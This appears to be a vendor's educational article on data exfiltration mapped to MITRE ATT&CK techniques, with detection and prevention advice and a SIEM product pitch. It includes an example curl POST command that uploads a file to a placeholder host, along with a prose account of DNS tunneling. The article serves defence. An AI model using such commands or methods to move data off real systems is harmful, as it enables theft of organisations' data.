Preventing data exfiltration using the MITRE ATT&CK® framework

  • Home
  • Preventing data exfiltration using the MITRE ATT&CK® framework

Data exfiltration is the unauthorized access and retrieval of sensitive data with malicious intentions. This can also lead to stolen and leaked confidential information and ransom demands.

Data exfiltration can result from:

  1. Hackers intruding on the network
  2. External threat actors use methods like phishing, social engineering, and exploitation of web vulnerabilities to target the victim's network and infect it with malware. After compromising the network, gaining access to critical resources through persistence, and establishing a command and control channel, they begin to exfiltrate data. Various tools and software are used to scan the network, steal credentials, and encrypt and compress data before transferring it to external servers.

  3. Malicious insiders
  4. An employee with malicious intent can exfiltrate data much more easily, as they are already in the fourth or fifth phase of the cyber kill chain, possessing the necessary administrative privileges or the ability to escalate their privileges as needed. Insiders are also aware of the organization's security policies, vulnerabilities, and suitable options to exfiltrate data, like sending outbound emails, uploading to the cloud, or transferring to removable devices like hard drives and USBs. Some may even use more covert channels and sophisticated techniques like external actors.

  5. Ignorant insiders
  6. Employees unaware of security best practices might unintentionally leak the organization's sensitive information through acts like using insecure public Wi-Fi for work, installing risky software, sharing credentials with other employees, and uploading data to unsafe public clouds. They become victims of social engineering, expose data, and enable malicious actors to pass the initial phases of the cyber kill chain comfortably.

Techniques used for data exfiltration

Data exfiltration is one of the 14 major tactics in the ATT&CK framework. The techniques defined under each tactic is an ever-growing list that gives us insights into the stealthy methods used by threat actors to proceed through the different phases of a cyberattack.

The following are some of the common techniques used by attackers listed in the ATT&CK framework for data exfiltration:

Command and Control channel
(ATT&CK technique T1041)

The command and control channel, also known as the C2 channel, is the communication bridge between external adversaries and the compromised network. The malware used to infect the victim's network is encoded with instructions and details to reach out to multiple external servers to receive additional payloads and to transfer the collected data. The C2 traffic is merged with the regular user traffic stream through frequently used ports to avoid raising suspicions. Tools like Attor, Bankshot, and Kessel are used to exfiltrate data through the C2 channel.

Exfiltration through protocols
(ATT&CK technique T1048)

Protocols like DNS, HTTP, HTTPS, and FTP are an integral part of the functioning of internet and web browsing. The request and response traffic of such protocols bypass most firewalls by default and is exploited by threat actors. They register new domains, set up rogue websites and DNS servers, and draw the data out of the victim's network by embedding the packets in the queries. Some organizations might block connections with newly registered domains, in which case threat actors may even hack other websites that are allowed access by the organization's firewalls to utilize the outbound traffic.

Use of protocols

HTTP: When users enter data in a website and upload files through forms, the HTTP post method is used to transfer that data to the web server. A hacker can exfiltrate data to their server through this method. This is also very convenient, as the limit for data transfer is set by the server. Command line tools like cURL and HTTP Prompt are used to directly send data through post requests.

curl -X POST -F "image=@/downloads/image.gif" http://URL/postimage.cgi

In the above command, -X denotes the HTTP method used, -F denotes the form upload, and the end has the URL of the site. There are also other flexible options to send data in different formats like JSON and XML.

DNS tunneling: The DNS protocol resolves domain names to IP addresses by forwarding queries to DNS servers in a hierarchical manner, starting with the resolver, then the root server, followed by the top-level domain server, and finally the authoritative name server. To exfiltrate data through DNS protocol, the data is first segmented into smaller sized bits. This helps staying within the data transfer threshold (T1030). The segments are then compressed and encrypted.

The malware in the victim's network sends DNS queries packed with the segmented chunks of data to the rogue authoritative name server (ANS) set up by the hacker. The maximum size of a fully qualified domain name (FQDN) is 255 bytes, out of which the 63 bytes allocated for the subdomain can be used to carry data. The file or files to be exfiltrated are converted into arrays of strings using encoding techniques and are gradually sent to the external server.

DNS responses used for C2: The domains have associated records like A (IPV4 address), AAAA (IPV6 address), CNAME (canonical names), and MX (mail exchange server). When these records are queried, a huge chunk of data can be sent from the ANS as a response. This is used as C2 channel by replacing the actual record values with instructions to the malware.

Apart from these application layer protocols, transport and session layer protocols are also used to exfiltrate data.

Exfiltration to devices in proximity
(ATT&CK technique T1011)

An organization's employee can use methods like copying files to removable storage devices and can use radio frequency channels like bluetooth to transfer files to their own devices. To implement this, first they disconnect the device from the organization's network and connect to cellular Wi-Fi. This helps evade the organization's security policies.

Exfiltration to web applications
(ATT&CK technique T1567)

Both internal and external threat actors can exfiltrate data to code repositories through the use of APIs and command line tools. Such repositories like GitHub are trusted and widely used, and large amounts of data can be transferred without raising suspicions. The same goes for SasS applications and cloud services like Google Drive, Google Docs, and Dropbox.

Prevention and detection of data exfiltration

Here are some proactive strategies and detection mechanisms you can implement in your organization to identify and stop data exfiltration attempts:

  • Utilize a SIEM tool to correlate anomalous events caused by malware like sudden increases in internet activities indicating communication with an external command and control channel, new tools and software installed, disabled anti-virus systems, and spikes in system errors.
  • Monitor protocols and outbound traffic: If there's frequent communication with a newly registered or an unlikely domain and post requests are being sent, alerts should be raised and the traffic should be analyzed. The DNS operates over UDP. If UDP switches to TCP, it indicates a high amount of data being transferred. This can either be a C2 channel or data being exfiltrated.
  • Process monitoring: Detect the execution of malicious command line tools.
  • Use UEBA and file monitoring tools for both internal and external threats. UEBA offers ML-based statistical behavior analysis that can detect abuse of privileged accounts and data exfiltration.
  • Integrate the ATT&CK framework into the organization's cybersecurity strategies: The techniques mentioned in the ATT&CK framework can be used by both the blue team and the red team to detect attacks and to test vulnerabilities.

What you can do to prevent data exfiltration

  1. Practice Zero Trust access and least privilege security models.
  2. Monitor and update firewall rules for both inbound and outbound traffic.
  3. Enable data encryption and backup.
  4. De-authorize device connection to cellular Wi-Fi for workstations with privileged access.
  5. Enforce the use of a VPN.
  6. Educate employees regarding cyber risks and the organiztion's security policies.
  7. Update applications and software regularly.

ManageEngine Log360, a comprehensive SIEM solution can help you implement and automate the above mentioned strategies and best practices. Utilize the advanced features like real-time network monitoring, correlation, integrated threat feeds, MITRE ATT&CK dashboard with predefined reports, log forensic analysis, instant alerting and incident management system to effectively detect and remediate data exfiltration attempts. Explore the solution now.

Products mentioned on this page:

Recently added chapters


Get the latest content delivered
right to your inbox!


SIEM Basics


  Zoho Corporation Pvt. Ltd. All rights reserved.